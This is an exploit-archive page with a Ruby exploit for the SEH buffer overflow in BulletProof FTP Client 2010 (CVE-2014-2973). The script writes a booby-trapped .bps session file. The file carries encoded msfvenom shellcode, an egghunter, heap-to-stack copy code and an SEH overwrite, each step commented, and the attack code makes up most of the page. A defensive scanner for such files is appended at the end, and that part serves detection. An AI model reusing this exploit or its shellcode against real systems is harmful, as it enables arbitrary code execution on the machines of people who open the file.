BulletProof FTP Client 2010 Buffer Overflow
Source: mind1355[at]gmail.com  Author: Ramli  Published: 2014-12-10
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypasses the buffer size limitation to allow a bigger payload. The 2nd
# shellcode is placed in the heap and copied back to the stack. This exploit uses
# an egghunter to locate the 2nd shellcode in the heap and copies it to the stack.
# Load the exploit file and click Connect to trigger the exploit.

# Offset
seh = 93
filename = "xsession.bps"
buff = "A" * 500

# ./msfvenom -p windows/exec CMD=mspaint -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby
heap_sc =
"w00tw00t" +
"\xda\xc4\xbf\xd7\xec\x92\xb5\xd9\x74\x24\xf4\x5d\x33\xc9" +
"\xb1\x32\x83\xed\xfc\x31\x7d\x16\x03\x7d\x16\xe2\x22\x10" +
"\x7a\x3c\xcc\xe9\x7b\x5f\x45\x0c\x4a\x4d\x31\x44\xff\x41" +
"\x32\x08\x0c\x29\x16\xb9\x87\x5f\xbe\xce\x20\xd5\x98\xe1" +
"\xb1\xdb\x24\xad\x72\x7d\xd8\xac\xa6\x5d\xe1\x7e\xbb\x9c" +
"\x26\x62\x34\xcc\xff\xe8\xe7\xe1\x74\xac\x3b\x03\x5a\xba" +
"\x04\x7b\xdf\x7d\xf0\x31\xde\xad\xa9\x4e\xa8\x55\xc1\x09" +
"\x08\x67\x06\x4a\x74\x2e\x23\xb9\x0f\xb1\xe5\xf3\xf0\x83" +
"\xc9\x58\xcf\x2b\xc4\xa1\x08\x8b\x37\xd4\x62\xef\xca\xef" +
"\xb1\x8d\x10\x65\x27\x35\xd2\xdd\x83\xc7\x37\xbb\x40\xcb" +
"\xfc\xcf\x0e\xc8\x03\x03\x25\xf4\x88\xa2\xe9\x7c\xca\x80" +
"\x2d\x24\x88\xa9\x74\x80\x7f\xd5\x66\x6c\xdf\x73\xed\x9f" +
"\x34\x05\xac\xf5\xcb\x87\xcb\xb3\xcc\x97\xd3\x93\xa4\xa6" +
"\x58\x7c\xb2\x36\x8b\x38\x4c\x7d\x91\x69\xc5\xd8\x40\x28" +
"\x88\xda\xbf\x6f\xb5\x58\x35\x10\x42\x40\x3c\x15\x0e\xc6" +
"\xad\x67\x1f\xa3\xd1\xd4\x20\xe6\xbc\xa9\xae\x68\x57\x20" +
"\x3b\x6b"

# badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2'
# find 1st heap address
heap_addr =
"\x50" + # push eax
"\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh
"\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777fh -> ebx = 0x30 (offset of the PEB pointer in the TEB)
"\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx] -> ebx = PEB
"\xb9\x0f\x78\x77\x77" + # mov ecx,7777780Fh
"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh -> ecx = 0x90 (PEB.ProcessHeaps)
"\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx] -> ebx = ProcessHeaps array
"\x8b\x1b" # mov ebx,dword ptr [ebx] -> ebx = first process heap

egghunter =
"\x8b\xd3" + # mov edx,ebx
"\xeb\x05" + # jmp short +5, skips the or and lands on inc edx (#2)
"\x66\x81\xca\xff\x0f" + # or dx, 0xfff (#1)
"\x42" + # inc edx (#2)
"\x52" + # push edx
"\x6a\x02" + # push 2
"\x58" + # pop eax
"\xcd\x2e" + # int 0x2e
"\x3c\x05" + # cmp al,5
"\x5a" + # pop edx
"\x74\xef" + # je $-0xf (#1)
"\xb8\x77\x30\x30\x74" + # mov eax,0x74303077 (our tag 'w00t')
"\x8b\xfa" + # mov edi,edx
"\xaf" + # scasd eax, dword ptr es:[edi]
"\x75\xea" + # jne $-0x14 (#2)
"\xaf" + # scasd eax, dword ptr es:[edi]
"\x75\xe7" + # jne $-0x17 (#2)

copy_sc =
"\x58" + # pop eax
"\x05\x54\xf2\xff\xff" + # add eax,-3500
"\x89\xfe" + # mov esi,edi
"\x89\xc7" + # mov edi,eax
"\xb9\x61\x78\x77\x77" + # mov ecx,0x77777861
"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f
"\xf2\xa4" + # rep movsb
"\xff\xe0" # jmp eax

stack_sc = heap_addr + egghunter + copy_sc

# GetPC
buff[1,2] = "\xd9\xeb"                      # fldpi
buff[3,5] = "\x9b\xd9\x74\x24\xf4"          # fstenv [esp-0xc]
buff[8,1] = "\x58"                          # pop eax: saved FPU instruction pointer = address of fldpi (buff[1])

# FixRet stub 
buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45"  # (1)
buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp
buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr

buff[30,stack_sc.size] = stack_sc

# repair stack
buff[12,4] = buff[seh-24,4]                 # replace with original sc (1)
buff[19,4] = buff[seh-4,4]                  # replace with original sc (2)
buff[26,4] = buff[seh,4]                    # replace with original sc (3)

buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp short -0x5a: back to the GetPC stub at buff[1]
buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # pop/pop/ret in msacm32.drv: the only non-SafeSEH module address without null bytes

# .bps session file: fixed header line, then CRLF-separated fields. buff lands
# in the first field (the overflowing one); heap_sc is placed in a later field so
# it ends up in the heap for the egghunter to find.
bps =
"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" +
"\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" +
"\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" +
"\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" +
"\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" +
"\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" +
"\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" +
buff + "\x0D\x0A\x61\x6E" +
"\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" +
"\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" +
"\x0A"

File.open(filename,"wb") do |fp|
  fp.write(bps)
  puts "Exploit file: #{filename} size: #{bps.size}"
  fp.close
end
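The exploit above shows enough of the .bps layout (a fixed header line, then CRLF-separated fields) to write a defensive check for session files before they are loaded. The following scanner is an added example, not part of the original exploit; the 128-byte field limit, the field numbering and the sample files are assumptions made for this check.

```ruby
# Added example (not from the original exploit): scan a BulletProof FTP .bps
# session file for fields that could not be legitimate host/user/password data.
# Assumed: a sane field never exceeds MAX_FIELD_LEN bytes or contains raw bytes.
BPS_HEADER = "This is a BulletProof FTP Client Session-File and should not be modified directly."
MAX_FIELD_LEN = 128          # assumed upper bound for any session-file field
EGG_TAG = "w00tw00t"         # egghunter marker used by the exploit above

# Returns an array of findings; an empty array means nothing looked wrong.
def scan_bps(data)
  data = data.b                                  # work on raw bytes
  findings = []
  lines = data.split("\r\n", -1)
  findings << "missing or altered session-file header" unless lines.first == BPS_HEADER
  lines.drop(1).each_with_index do |field, i|
    next if field.empty?
    if field.bytesize > MAX_FIELD_LEN
      findings << "field #{i + 1}: #{field.bytesize} bytes exceeds #{MAX_FIELD_LEN}"
    end
    if field.bytes.any? { |b| b < 0x20 || b > 0x7e }
      findings << "field #{i + 1}: contains non-printable bytes"
    end
    findings << "field #{i + 1}: contains egghunter tag #{EGG_TAG}" if field.include?(EGG_TAG)
  end
  findings
end

# Constructed sample: a benign session file.
def benign_sample
  [BPS_HEADER, "ftp.example.test", "anonymous", "guest", ""].join("\r\n")
end

# Constructed sample shaped like the exploit file: an oversized first field
# carrying opcode bytes, and the egg tag followed by filler in a later field.
def suspicious_sample
  host = ("A" * 500).b
  host[1, 2] = "\xd9\xeb".b
  [BPS_HEADER, host, "anonymous", EGG_TAG + "\xcc".b * 16, ""].join("\r\n")
end

if __FILE__ == $0
  [benign_sample, suspicious_sample].each do |sample|
    f = scan_bps(sample)
    puts f.empty? ? "clean" : f.join("\n")
  end
end
```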

 